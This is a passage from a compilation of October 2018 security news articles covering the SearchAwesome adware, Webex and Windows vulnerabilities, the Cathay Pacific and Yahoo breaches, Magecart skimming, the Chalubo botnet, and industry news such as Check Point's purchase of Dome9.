SearchAwesome also installs the open-source program mitmproxy, which was designed to intercept, inspect, modify, and replay web traffic. It abuses the application to target both unencrypted and encrypted traffic in a man-in-the-middle (MitM) attack.

Armed with the ability to modify Certificate Trust Settings and using the mitmproxy certificate that is now trusted by the system, the malware gains access to HTTPS traffic, which is normally encrypted between the browser and the website, thus protected from prying eyes.

The threat injects JavaScript into every web page the victim visits. The script is loaded from a malicious website.

If spi.app is deleted, the uninstall agent runs a script to disable a proxy the adware set up initially, fetches information from the program’s preferences and sends it to a web server, and removes the preferences and the launch agents.

The script also causes an authentication request to appear four times, Malwarebytes reveals. Furthermore, the uninstaller leaves behind the mitmproxy software, and the certificate the app uses to access encrypted web traffic.

The adware seems innocuous at the moment, as it only injects a script to display ads but, given that the script is actually being loaded from an external server, the content could change at any time and phishing pages or malware could be served instead.

“The injected script could be used to do anything, from mining cryptocurrency to capturing browsing data to keylogging and more. Worse, the malware itself could invisibly capture data through the MitM attack, without relying on JavaScript or modifying the web page content,” Malwarebytes points out.

Even if the malware uninstalls itself, the potential for damage is not over, given that it leaves behind the tools it uses to execute the MitM attack. This means that another piece of malware could leverage the tools for their own nefarious purposes.

Google requires 2 years of Android security updates for popular devices
26.10.2018 securityaffairs
Android  Vulnerebility

The media outlet The Verge obtained a copy of a contract between Google and OEMs that obliges them to two years of security updates for popular phones.
Google continues the battle for securing devices of its users, this time making mandatory for device makers two years of Android security updates.

One of the main problems with patch management is related to the distribution of security patches issued by Google for Android OS.

Device manufacturers often delay the installation of these security patches exposing device owners to cyber attacks. Google is committed to solving this issue, during the Google I/O Developer Conference May 2018 announced it its plan to update its OEM agreements that would require Android device manufacturers to roll out at least security updates regularly.

A Google spokesperson declared that the 90-day requirement is “a minimum security hygiene requirement” and that “the majority of the deployed devices for over 200 different Android models from over 30 Android device manufacturers are running a security update from the last 90 days.”

The media outlet The Verge obtained a copy of the agreement between the tech giant and OEMs, the contract obliges Android device makers to regularly install updates for any popular phone or tablet for at least two years. For the second year, OEMs have to continue to provide security updates but the contract did not mention the exact number of updates.
In case OEMs violate the contract, they will lose their Google certification for upcoming Android devices, they must roll out at least four security updates within one year of the phone’s launch.

“A contract obtained by The Verge requires Android device makers to regularly install updates for any popular phone or tablet for at least two years. Google’s contract with Android partners stipulates that they must provide “at least four security updates” within one year of the phone’s launch.” states The Verge.

“Security updates are mandated within the second year as well, though without a specified minimum number of releases.”

Android OEMs will be obliged to regularly provide security updates for popular devices that have been launched after January 31st, 2018 and that have more than 100,000 active users.

Besides this, the contract also stipulates that the manufacturers must not delay patch updates for security vulnerabilities for more than 90 days.

In other words, the minimum requirement of the contract is a security patch update every quarter.

The contract obtained by The Verge could have a massive impact for both OEMs and end-users, the overall level of security for Android device will increase in a significant way.

“But because manufacturers rely on Google for its suite of apps, the company can also make outright demands for updates in its contract. This contractual commitment to patching devices goes much further and guarantees in many cases that devices will remain up to date.” concludes The Verge.

” As Android splits following the EU ruling, the contract also raises questions about how non-Google phones will receive security updates without the same contractual pressures.”

Experts discovered a severe command injection flaw in Cisco Webex Meetings Desktop
26.10.2018 securityaffairs

Researchers discovered a “high” severity command injection vulnerability, tracked as CVE-2018-15442, in Cisco Webex Meetings Desktop.
It’s time to patch again the Cisco Webex video conferencing software of your organization to avoid ugly surprise.

Researchers Ron Bowes and Jeff McJunkin of Counter Hack discovered a “high” severity command injection vulnerability, tracked as CVE-2018-15442, in Cisco Webex Meetings Desktop.

The vulnerability could be exploited by an authenticated, local attacker to execute arbitrary commands as a privileged user.

“The vulnerability is due to insufficient validation of user-supplied parameters. An attacker could exploit this vulnerability by invoking the update service command with a crafted argument. An exploit could allow the attacker to run arbitrary commands with SYSTEM user privileges.” states the advisory published by Cisco.

“While the CVSS Attack Vector metric denotes the requirement for an attacker to have local access, administrators should be aware that in Active Directory deployments, the vulnerability could be exploited remotely by leveraging the operating system remote management tools.”

Cisco advisory reveals that the vulnerability could be exploited remotely by leveraging the operating system remote management tools.

The vulnerability could be exploited by a malware or ill-intentioned logged-in user to gain system administrator rights and carry out malicious activities.

The vulnerability affects all Cisco Webex Meetings Desktop App releases prior to 33.6.0, and Cisco Webex Productivity Tools Releases 32.6.0 and later prior to 33.0.5, when running on a Microsoft Windows end-user system.

cisco webex

Bowes and McJunkin dubbed the issue WebExec, they explained that it’s a remote vulnerability in a client application that doesn’t even listen on a port.

The experts pointed out that the installation of the WebEx client also include the WebExService that can execute arbitrary commands as a system admin.

“WebExec is a vulnerability in, as the name implies, Cisco’s WebEx client software. This is a pretty unique vulnerability, because it’s a remote vulnerability in a client application that doesn’t even listen on a port.” wrote the experts.

“The summary is: when the WebEx client is installed, it also installs a Windows service called WebExService that can execute arbitrary commands at SYSTEM-level privilege. Due to poor ACLs, any local or domain user can start the process over Window’s remote service interface (except on Windows 10, which requires an administrator login).”

The flaw was discovered 0n July 24, 2018, and it was reported to Cisco on August 6, 2018. On October 24, 2018, the company released the advisory.

In order to allow admins and users to check and exploit the flaw, the security duo created Nmap and Metasploit scripts.

According to Bowes, the exploitation of the flaw is very easy.

“exploiting the vulnerability is actually easier than checking for it!” wrote Bowes.

“The patched version of WebEx still allows remote users to connect to the process and start it. However, if the process detects that it’s being asked to run an executable that is not signed by Webex, the execution will halt.”

Cathay Pacific Hit by Data Leak Affecting 9.4M Passengers
25.10.2018 securityweek

Hong Kong flag carrier Cathay Pacific said Wednesday it had suffered a major data leak affecting up to 9.4 million passengers.

The airline admitted data including passport numbers, identity card numbers, email addresses and credit card details was accessed.

"We are in the process of contacting affected passengers, using multiple communications channels, and providing them with information on steps they can take to protect themselves," Cathay Pacific Chief Executive Officer Rupert Hogg said in a statement on the airline's website.

"We have no evidence that any personal data has been misused."

Cathay said it had launched an investigation and alerted the police after an ongoing IT operation revealed unauthorised access of systems containing the passenger data of up 9.4 million people.

Hogg added: "The following personal data was accessed: passenger name, nationality, date of birth, phone number, email, address, passport number, identity card number, frequent flyer programme membership number, customer service remarks, and historical travel information."

The CEO also revealed 403 expired credit card numbers and 27 credit card numbers with no CVV were accessed.

"The combination of data accessed varies for each affected passenger," he said.

The leak comes as the troubled airline battles to stem major losses as it comes under pressure from lower-cost Chinese carriers and Middle East rivals.

It booked its first back-to-back annual loss in its seven-decade history in March, and has previously pledged to cut 600 staff including a quarter of its management as part of its biggest overhaul in years.

Hogg did not mention financial compensation for passengers affected by the data leak, but British Airways pledged to compensate customers when the UK flag carrier suffered a data hack last month.

BA revealed in September that personal and financial details of about 380,000 customers who booked flights on the group's website and mobile phone app over several weeks had been stolen.

The revelation came just a few months after the European Union tightened data protection laws with the so-called General Data Protection Regulation (GDPR).

CEO Alex Cruz said the firm had been the victim of a "malicious, criminal attack on our website".

The airline took out full-page adverts in UK newspapers to apologise to customers, while the share price of parent group IAG was hit.

Exploit for New Windows Zero-Day Published on Twitter
25.10.2018 securityweek
Exploit  Vulnerebility

A new zero-day vulnerability in Windows was made public on Twitter by the same researcher who published an exploit for a bug in the Windows Task Scheduler at the end of August.

The newly revealed security flaw impacts the Microsoft Data Sharing library dssvc.dll, and can be exploited by attackers who already have access to the affected system.

The researcher who found the bug, and who goes by the online handle of SandboxEscaper, also published a proof-of-concept (PoC) on GitHub. The code deletes files from the system that only admins would normally have the permission to delete and causes the system to crash.

“Not the same bug I posted a while back, this doesn't write garbage to files but actually deletes them.. meaning you can delete application dll's and hope they go look for them in user write-able locations. Or delete stuff used by system services c:\windows\temp and hijack them,” SandboxEscaper says.

The vulnerability impacts only the latest Windows versions, as the Data Sharing Service was introduced in Windows 10 (Windows Server 2016 and Server 2019 are also affected). Cyber-security expert Kevin Beaumont explains that the exploit abuses “a new Windows service not checking permissions again.”

“This is an elevation of privilege zero-day vulnerability in Microsoft's Data Sharing Service (dssvc.dll), which is used to broker data between applications,” Tom Parsons, Head of Research at Tenable, told SecurityWeek in an emailed comment.

Given that Windows 10 is the second most prevalent Microsoft operating system after Windows 7, the vulnerability could prove attractive to attackers, he suggests.

“To put the threat into perspective, an attacker would already need access to the system or combine it with a remote exploit to leverage the vulnerability. This could be exploited to facilitate lateral movement within an organization or even potentially destructive purposes - such as deletion of key system files rendering a system inoperable,” Parsons says.

Exploitation of this vulnerability, however, isn’t that easy, as even SandboxEscaper said it right from the start. As Beaumont points out, the bug might be “fairly difficult to exploit in a meaningful way.” The most likely scenario would involve targeting OEM drivers, but it’s not practical, he says.

Mitja Kolsek, CEO of ACROS Security and co-founder of 0patch, was among the first to confirm that the published PoC works. Within hours, however, the 0patch team came up with a micropatch for the bug. A micropatch for Windows Server 2016 was also announced.

Micropatch for Windows zero-day

It’s not surprising that 0patch released a fix so fast, as the community is focused on delivering small patches for bugs that vendors haven’t had time to address yet.

At the end of August, they released a micropatch for the Windows Task Scheduler zero-day found by SandboxEscaper. More recently, they released a fix for a Microsoft JET Database Engine flaw that Trend Micro's Zero Day Initiative (ZDI) made public in late September. In fact, they addressed the issue twice, as Microsoft’s official patch was incomplete.

Check Point Acquires Dome9 for $175 Million
25.10.2018 securityweek

Enterprise cybersecurity solutions provider Check Point Software Technologies on Wednesday announced the acquisition of Dome9, a company that specializes in cloud security infrastructure.

Check Point representatives told SecurityWeek that Dome9 was acquired for $175 million in cash, along with restricted stock units (RSUs) and stock options.

By acquiring Dome9, Check Point hopes to enhance its Infinity architecture and cloud security offering by adding advanced active policy enforcement and multi-cloud protection capabilities.

Founded in 2011, Israel-based Dome9 provides security and compliance solutions for multi-cloud deployments across Microsoft Azure, AWS, and Google Cloud. The company’s platform includes capabilities such as security posture visualization, identity protection, compliance and governance automation, and cloud traffic and event analysis.

The company says its customers include many Fortune 1000 enterprises, global system integrators, and managed service providers.

“Dome9 and Check Point’s CloudGuard together provide the best cloud security solution in the industry. Dome9’s platform will add rich cloud management and active policy enforcement capabilities to Check Point’s Infinity Architecture, particularly complementing the CloudGuard security product family and make our broad solution even more differentiated in the rapidly moving Cyber Security environment,” said Gil Shwed, CEO of Check Point.

“As 5th generation cyber attacks increasingly target enterprise cloud environments, so our Gen V cyber security solution must effectively protect this vector. This acquisition will enhance our ability to deliver the benefits of Cloud with the critical security that must extend from the networks, endpoints and data centers to the Cloud and Mobile enterprise-wide,” Shwed added.

Cathay Pacific data breach affecting 9.4 million passengers
25.10.2018 securityaffairs

Cathay Pacific Airways Limited, the flag carrier of Hong Kong, had suffered a major data leak affecting up to 9.4 million passengers.
Cathay Pacific Airways Limited, the flag carrier of Hong Kong, admitted having suffered a major data leak affecting up to 9.4 million passengers.

Exposed data includes passport numbers, identity card numbers, email addresses, and credit card details were accessed, information exposed varies for each affected passenger.

“As part of our ongoing IT security processes, we have discovered unauthorised access to some of our passenger data. Upon discovery, we took immediate action to contain the event, and further strengthen our IT security measures.” reads the official statement published by the airline.

The IT staff at Cathay discovered an unauthorized access of systems containing the passenger data of up 9.4 million people. Hackers also accessed 403 expired credit card numbers and twenty-seven credit card numbers with no CVV were accessed.

The company is notifying the affected passengers through multiple channels.

“We are in the process of contacting affected passengers, using multiple communications channels, and providing them with information on steps they can take to protect themselves,” said Cathay Pacific Chief Executive Officer Rupert Hogg.

“We have no evidence that any personal data has been misused.”

“The following personal data was accessed: passenger name, nationality, date of birth, phone number, email, address, passport number, identity card number, frequent flyer programme membership number, customer service remarks, and historical travel information.” Hogg added.

Cathay Pacific

The company immediately reported the incident to the authorities and launched an investigation.

At the time there is no news about financial compensation for affected passengers.

Anyone who believes they may be affected can contact Cathay Pacific in the following ways:

Via the dedicated website – infosecurity.cathaypacific.com – which provides information about the event and what to do next
Via Cathay Pacific’s dedicated call centre available after 12:30/25OCT (GMT+8) (toll free numbers are available on infosecurity.cathaypacific.com)
Email Cathay Pacific at infosecurity@cathaypacific.com
Recently, personal and payment card information of 380,000 British Airways customers were stolen by MageCart hackers, and the company pledged to compensate customers.

Magecart hackers change tactic and target vulnerable Magento extensions
25.10.2018 securityaffairs

Magecart cybercrime gang made the headlines again, the cyber criminal gang is now targeting vulnerable Magento Extensions.
Magecart cybercrime gang switches tactic, it is now targeting vulnerable Magento extensions. instead of compromising large websites or third-party services to steal credit card data.

In previous campaigns, attackers customize the attack for each victim tailoring the code for each target site according to the information gathered through an initial reconnaissance phase. The avoid the detection, Magecart hackers injected only into specific pages.

In the last months, the gang hit several major platforms, including British Airways, Newegg, Ticketmaster, and Feedify.

The new attack was detailed by the researcher Willem de Groot, the hackers are now exploiting zero-day vulnerabilities in popular store extension software in order to inject skimmer scripts.

“Online credit card theft has been all over the news: criminals inject hidden card stealers on legitimate checkout pages. But how are they are able to inject anything in the first place? As it turns out, thieves are massively exploiting unpublished security flaws (aka 0days) in popular store extension software.” continues the expert.

“While the extensions differ, the attack method is the same: PHP Object Injection (POI).

Now attackers leverage PHP Object Injection (POI) by abusing PHP’s unserialize() function in order to compromise websites. With this attack method, they are able to modify the database or any JavaScript file.

According to de Groot, many popular PHP applications continue to use unserialize(), but while Magento has replaced most of the vulnerable functions, many of its extensions are still flawed.

“This attack vector abuses PHP’s unserialize() function to inject their own PHP code into the site.” continues the researcher.

“With that, they are able to modify the database or any Javascript files. As of today, many popular PHP applications still use unserialize(). Magento replaced most of the vulnerable functions by json_decode() in patch 8788, but many of its popular extensions did not.”

The attackers have analyzed a large number of extensions and discovered numerous POI vulnerabilities, then they are scanning the Internet for Magento installs using these extensions.

Once the attackers have found a vulnerable store they exploit the zero-day to insert a JavaScript payment overlay customized for the specific target site.

“Once any of the probes above is successful, a malicious actor will come back and insert a customized Javascript payment overlay for the specific site. This works for sites that have external payments, or no credit card payments at all, because a fake credit card payment section is inserted.” states the researcher.

“Once a user enters his CC details and clicks submit, the fake credit card form disappears and the unsuspecting (?) user will likely try again. The fake form will not show a second time, because a cookie is set to prevent that.”

Further details are included in the analysis published by the researcher.

Magecart Hackers Now Targeting Vulnerable Magento Extensions

25.10.2018 securityweek Incindent  Vulnerebility

After compromising large websites or third-party services they use in order to steal credit card information, the Magecart hackers have now turned to vulnerable Magento extensions.

As part of the attack, the Magecart threat actors insert a small piece of JavaScript code onto the compromised website to steal all of the credit card and associated information that users enter there.

The hackers only inject their code after thorough reconnaissance, as the code in each attack is specifically tailored for the targeted site and blends in with the rest of the domain’s resources. The code is injected only into specific pages, to remain unnoticed but ensure efficiency.

Active for a couple of years, the hackers have only recently started targeting large platforms, including British Airways, Ticketmaster, Newegg, and cloud service provider Feedify, which has attracted a lot of attention. Last month, the operation hit Shopper Approved.

Now, security researcher Willem de Groot reveals that the attackers have switched to targeting unpublished vulnerabilities in popular store extension software.

The hackers seek to compromise websites through PHP Object Injection (POI) by abusing PHP’s unserialize() function. This provides them with the ability to modify the database or any JavaScript file, the researcher says.

Many popular PHP applications continue to use unserialize(), de Groot reveals. While Magento has replaced most of the vulnerable functions, many of its extensions did not.

“It appears that attackers have amassed a large number of extensions and found numerous POI vulnerabilities. And they are now probing Magento stores in the wild for these extensions,” the researcher, who published a list of the impacted extensions, explains.

Once a probe is successful, the malicious actors return to the impacted website and insert a JavaScript payment overlay customized for that site. The attack works on sites that have external or no credit card payments, because it inserts a fake credit card payment section.

As soon as the user enters their credit card data and submits it, the fake payment form disappears. The user is likely to try entering their information again, but the fake form is only showed once, because a cookie is set to ensure that. The code, de Groot reveals, uses a two-step payment exfiltration method.

Firefox 63 Blocks Tracking Cookies
25.10.2018 securityweek

Firefox 63 was released on Tuesday with a new cookie policy meant to prevent cross-site tracking by effectively blocking cookies and other site data from third-party tracking resources.

The move was announced in August, when the feature entered the initial testing phase. Now, all desktop versions of Firefox include the experimental cookie policy that not only protects against cross-site tracking, but also aims to minimize site breakage associated with traditional cookie blocking.

The new policy was added as part of the Enhanced Tracking Protection feature, which represents Mozilla’s new effort to protect users from being tracked across the websites they access.

“We aim to bring these protections to all users by default in Firefox 65,” Mozilla says.

The new policy effectively blocks domains classified as trackers from accessing the storage on the user’s device. Thus, such domains cannot access or set cookies or other site data when loaded in a third-party context.

Trackers are also blocked from accessing other APIs that could allow them to communicate cross-site, such as the Broadcast Channel API. Firefox uses the Tracking Protection list maintained by Disconnect to know which domains are classified as trackers.

Blocking third-party cookies may break websites, especially if the sites integrate third-party content. To prevent issues, Mozilla added heuristics to Firefox to automatically grant time-limited storage access under certain conditions. Such permissions are added on a site-by-site basis, and only for access to embedded content that receives user interaction.

More structured access will be available through a Storage Access API that is now implemented in Firefox Nightly for testing. Also implemented in Safari, the API is a proposed addition to the HTML specification. It allows trackers to explicitly request storage access when loaded in a third-party context.

To enable the new policy in Firefox, users should go to Options > Privacy & Security and select Third-Party Cookies in the Content Blocking section, then select Trackers (recommended). Users, however, can still take advantage of Tracking Protection to block all tracking loads. They simply need to set All Detected Trackers to Always.

Firefox 63 was also released with patches for 14 vulnerabilities, including two memory safety bugs rated “critical severity.” Additionally, it addressed three high risk bugs, four medium severity issues, and 5 low risk flaws.

The new browser release was also supposed to completely remove trust in Symantec certificates but, after learning that over 1% of the top 1,000,000 websites still use such certificates, Mozilla decided to delay the move.

Google Blocks New Ad Fraud Scheme
25.10.2018 securityweek

Google says it recently blocked a new ad fraud scheme spread across a large number of applications and websites and monetizing with numerous advertising platforms.

Previously, the company had blocked websites from its ad network for violating its policies, but now it also took action against applications that were involved in the fraud scheme, after being tipped off by BuzzFeed News.

Not only did the web search company ensure that these apps can no longer monetize with Google, it also blacklisted additional apps and websites outside of its ad network, “to ensure that advertisers using Display & Video 360 (formerly known as DoubleClick Bid Manager) do not buy any of this traffic.”

The company estimates that “the dollar value of impacted Google advertiser spend across the apps and websites involved in the operation is under $10 million.” Basically, money was spent on invalid traffic on inventory from non-Google, third-party ad networks.

The web-based traffic was generated by a small to medium-sized botnet that has been tracked for several years as TechSnab. The number of infections has decreased significantly after the Chrome Cleanup tool started prompting users to uninstall the threat, Google says.

The malware, which has common IP-based cloaking, data obfuscation, and anti-analysis defenses, creates hidden browser windows that visit web pages to artificially inflate ad revenue. Traffic is directed to a ring of websites that have been specifically designed for this operation.

The operation monetized through a large number of ad exchanges. According to Google, as many as 150 exchanges, supply-side platforms (SSPs) or networks may have sold inventory from these websites. The operators had hundreds of accounts across 88 different exchanges, the search giant reveals.

Mobile apps were impacted the most, monetizing via AdMob. Traffic from these apps appears as a combination of organic user traffic and artificially inflated ad traffic, including that generated by hidden ads.

“Additionally, we found the presence of several ad networks, indicating that it's likely many were being used for monetization. We are actively tracking this operation, and continually updating and improving our enforcement tactics,” Google says.

In addition to taking action to disrupt this threat, including the takedown of command and control infrastructure that powers the associated botnet, Google has shared information with partners across the ecosystem, so they too can harden defenses and minimize impact.

“This effort highlights the importance of collaborating with others to counter bad actors. Ad fraud is an industry-wide issue that no company can tackle alone. We remain committed to fighting invalid traffic and ad fraud threats such as this one, both to protect our advertisers, publishers, and users, as well as to protect the integrity of the broader digital advertising ecosystem,” Google notes.

Pentagon Launches Continuous Bug Bounty Program
25.10.2018 securityweek

The Department of Defense announced on Wednesday that its “Hack the Pentagon” bug bounty program will run all year long and will target the organization’s high-value assets.

The continuous Hack the Pentagon project is powered by crowdsourced security platform Bugcrowd, which is the third Silicon Valley company awarded a contract by the DoD for bug bounty programs.

HackerOne has helped the department run time-limited bug bounty programs, such as the first Hack the Pentagon, Hack the Air Force, Hack the Marine Corps, and Hack the Army.

Synack, which offers managed bug bounty services, was contracted by the Pentagon to provide assistance for a private program focusing on sensitive IT assets and open only to highly vetted researchers.

The year-long program targets high-value assets, including hardware and physical systems, and its goal is to help the DoD collaborate with vetted researchers throughout the development lifecycle of systems, many of which are regularly updated.

The Pentagon says it will also launch other bug bounty programs for public-facing websites.

“As cyber threats persist, the Defense Department is working to identify innovative approaches to bolster security, combat malicious activities, and build trusted private sector partnerships to counter threats. Hack the Pentagon bug bounties are designed to identify and resolve security vulnerabilities across targeted DOD websites and assets and pay cash to highly vetted security researchers or ‘ethical hackers’ to discover and disclose bugs,” the DoD said.

Yahoo to Pay $50M, Other Costs for Massive Security Breach
25.10.2018 securityweek

Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.

The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.

It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.

Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.

Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.

About 3 billion Yahoo accounts were hit by hackers that included some linked to Russia by the FBI . The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.

Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.

The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.

Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.

The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.

The lawyers for Yahoo’s accountholders praised the settlement as a positive outcome, given the uncertainty of what might have happened had the case headed to trial.

Estimates of damages caused by security breaches vary widely, with experts asserting the value of personal information held in email accounts can range from $1 to $8 per account. Those figures suggest Yahoo could have faced a bill of more than $1 billion had it lost the case.

But Yahoo had disputed those damages estimates and noted many of its accountholders submitted false information about their birthdates, names and other parts of their lives when they set up their email.

The lawyers representing Yahoo accountholders have a big incentive to get the settlement approved. Yahoo will pay them up to $37.5 million in fees and expenses if it goes through.

Oath, the Verizon subsidiary that now oversees Yahoo, declined to comment.

A hearing to approve the preliminary settlement is scheduled for Nov. 29 before U.S. District Judge Lucy Koh in San Jose. If approved, notices will be emailed to affected accountholders and published in People and National Geographic magazines.

SandboxEscaper expert is back and disclosed a new Windows Zero-Day
25.10.2018 securityaffairs

The security researcher SandboxEscaper has released the proof-of-concept exploit code for a new Windows zero-day, Windows users are now exposed to attacks.
The security researcher using the Twitter handle @SandboxEscaper is back and has released the proof-of-concept exploit code for a new Windows zero-day vulnerability.

At the end of August, the same researcher disclosed the details of zero-day privilege escalation vulnerability affecting the Microsoft’s Windows Windows Task Scheduler that could be exploited by a local attacker or malicious program to obtain system privileges on the vulnerable system.

Now SandboxEscaper published a tweet containing a link to a Github page hosting a proof-of-concept (PoC) exploit for a privilege escalation vulnerability affecting Microsoft Data Sharing (dssvc.dll).

The Data Sharing Service is a local service that runs as LocalSystem account with extensive privileges, it provides data brokering between applications.

https://github.com/SandboxEscaper/randomrepo/blob/master/DeleteBug1.rar … Here's a low quality bug that is a pain to exploit.. still unpatched. I'm done with all this anyway. Probably going to get into problems because of being broke now.. but whatever.

4:39 PM - Oct 23, 2018

Repo for random stuff. Contribute to SandboxEscaper/randomrepo development by creating an account on GitHub.

342 people are talking about this
Twitter Ads info and privacy

Security experts that the way SandboxEscaper’ disclosed the flaw has left all Windows users vulnerable to the cyber attacks, at least since Microsoft will not address it. A new round of security updates in scheduled for November 13, 2018.

The vulnerability could be exploited by an attacker with low privileges to elevate them on the vulnerable system. The expert shared the PoC exploit code (deletebug.exe) to delete critical system files, an operation that requests admin level privileges.ù

“Not the same bug I posted a while back, this doesn’t write garbage to files but actually deletes them.. meaning you can delete application dll’s and hope they go look for them in user write-able locations. Or delete stuff used by system services c:\windows\temp and hijack them,” SandboxEscaper explained.

Security experts noticed that the flaw only affects Windows 10 and recent versions of Windows Server editions because older versions of the Microsoft operating systems don’t implement the Microsoft Data Sharing service.

The popular researcher Will Dormann successfully tested the PoC exploit on fully-patched Windows 10 system” running an OS version that included the October 2018 security updates, Server 2016 and Server 2019.

Experts fear that the release of the PoC could help attackers in actively exploiting the flaw in the wild.

DDoS-Capable IoT Botnet 'Chalubo' Rises
24.10.2018 securityweek
BotNet  IoT

A new piece of malware is targeting Internet of Things (IoT) devices in an attempt to ensnare them into a botnet capable of launching distributed denial-of-service (DDoS) attacks, Sophos Labs reports.

Dubbed Chalubo (ChaCha-Lua-bot), the malware incorporates code from the Xor.DDoS and Mirai families, but also brings improvements in the form of anti-analysis techniques. Specifically, the authors have encrypted both the main component and its corresponding Lua script using the ChaCha stream cipher.

In late August, the attackers were observed using three malicious components for the threat, namely a downloader, the main bot, and the Lua command script. The bot ran only on systems with an x86 architecture.

Several weeks ago, the cybercriminals started using the Elknot dropper to deliver the rest of Chalubo. More importantly, Sophos Labs security researchers observed a variety of bot versions, designed to target different architectures, including 32-bit and 64-bit ARM, x86, x86_64, MIPS, MIPSEL, and PowerPC.

Due to the expanded target list, Sophos has concluded that the malware author might have been testing the bot at first, but that the trial has ended and an uptick in activity from this new threat is to be expected.

In early September, the malware was being distributed through brute-force attacks on SSH servers. The attackers were using the root:admin credential pair to compromise devices, Sophos reveals, based on an attack on their honeypot.

“This bot demonstrates increased complexity compared to the standard Linux bots we typically see delivered from these types of attacks. Not only are the attackers using a layered approach to dropping malicious components, but the encryption used isn’t one that we typically see with Linux malware,” the researchers note.

One of the files the malware’s downloader would drop is a script, and the manner in which this action is performed is an exact match to the behavior of the Xor.DDoS family. In fact, it appears that Chalubo copied the code responsible for persistence from the older malware.

Furthermore, the researchers discovered that the Chalubo authors also copied a few code snippets from Mirai, including some of the randomizing functions.

However, the majority of functional code in the new malware family is new, as the author mainly focused on the Lua handling for performing DDoS attacks with DNS, UDP, and SYN floods.

The bot’s Lua script was designed to call home to the command and control (C&C) server to provide details on the infected machine and to receive further instructions. It would also download, decrypt, and execute whatever Lua script it finds.

“Since the primary method of this bot infecting systems is through the use of common username and password combinations against SSH servers, we recommend that sysadmins of SSH servers (including embedded devices) change any default passwords on those devices, because the brute force attempts to cycle through common, publicly known default passwords,” Sophos concludes.

The Rise of The Virtual Security Officer
24.10.2018 securityweek

The market for virtual security officers is growing. We’ve had virtual chief information security officers for a few years (vCISOs), and we can expect to see virtual data protection officers (vDPOs) in the next few. The demand for both is higher than it has ever been, and it is likely to grow.

This article will examine the rise of virtual security officers, the role of virtual security officers, and navigating the choice of a virtual officer.

The rise of the virtual security officer

It is increasingly important for organizations to have and be seen to have a CISO. The difficulty in keeping data safe from sophisticated cyber criminals and well-resourced and persistent nation state actors is compounded by a likely increase in regulatory demands that organizations have a named CISO or head of cybersecurity.

The latter is already happening. The New York State Department of Financial Services regulation 23 NYCRR Section 500 states, “Each Covered Entity shall designate a qualified individual responsible for overseeing and implementing the Covered Entity’s cybersecurity program and enforcing its cybersecurity policy (for purposes of this Part, ‘Chief Information Security Officer’ or ‘CISO’).” It then adds that this CISO need not be directly employed, but could, in fact, be a virtual CISO.

GDPR, Article 37, states, “The controller and the processor shall designate a data protection officer…” This requirement for a DPO applies to public bodies (apart from courts) and any organization where data subject processing or monitoring occurs ‘on a large scale’. Paragraph 2 adds, “A group of undertakings may appoint a single data protection officer provided that a data protection officer is easily accessible from each establishment;” again paving the way for virtual DPOs.

Virtual Security OfficersIt then becomes a supply-and-demand problem – there simply aren’t enough good experienced CISOs and DPOs to go around. Those that exist are attracted to big prestigious companies that can afford to pay high salaries. A leading CISO told SecurityWeek he had applied for a different position because of ‘the insane amount of money being offered’. He was one of 200 qualified applicants for the position; and the whole process is indicative of the migration of good qualified CISOs from small and medium organizations to large and prestigious organizations.

This leaves smaller firms struggling to find security officers that are required by law and cybersecurity conditions. Virtual officers would appear to be the obvious solution.

“Virtual CISOs are certainly on the rise,” Rick Moy, CMO at Acalvio told SecurityWeek. “Like previous trends where mid-sized organizations lacked financial and legal talent, they turned to retainer-based professionals with specialized expertise. In many ways virtual security officers are similar to virtual CFOs and attorneys.”


The CISO role is not an easy one. Scott King, senior director with Rapid7’s security advisory services, explains, “They must be adoptive of a mindset where they anticipate how, and where, bad things will happen, understand how the technology can be abused by adversaries, while at the same time being able to communicate all of that in terms of risk and potential financial exposure to the C-suite and the Board.”

He adds, they “must be able to demonstrate the typical soft skills any leader needs to have… The hard part though, is learning how to talk to people about security in a way that resonates and doesn't alienate or create tenacious relationships. In other words, the supply of people with those skills is short, and the need for those people outpaces the supply.”


The two key requisites for a DPO are the ability to act independently of the security team, and to have a deep understanding of data protection regulations. The latter is no easy task. Apart from GDPR and other national laws around the globe, each state in the U.S. has its own separate data protection regulation.

The DPO is defined in Recital 97 of the GDPR as “a person with expert knowledge of data protection law and practices [who] should assist the controller or processor [primarily the CISO] to monitor internal compliance with this Regulation.” It adds that the DPO should be able to act in an independent manner.

The implication is that under GDPR the DPO role must not be undertaken by the CISO, while under other regulations it almost certainly should not be. It is a position that sits between Legal, Security and IT that demands an understanding of each. However, it is hard to see how for any organization other than the very largest, the required DPO needs to be a full-time position.

The role of the virtual security officer

Virtual security officers may be the solution for smaller companies that cannot find a qualified CISO within their price range, or have just lost a CISO and are struggling to re-fill the position; and for companies that are required to have a named DPO but do not wish or cannot afford a full-time specialist.

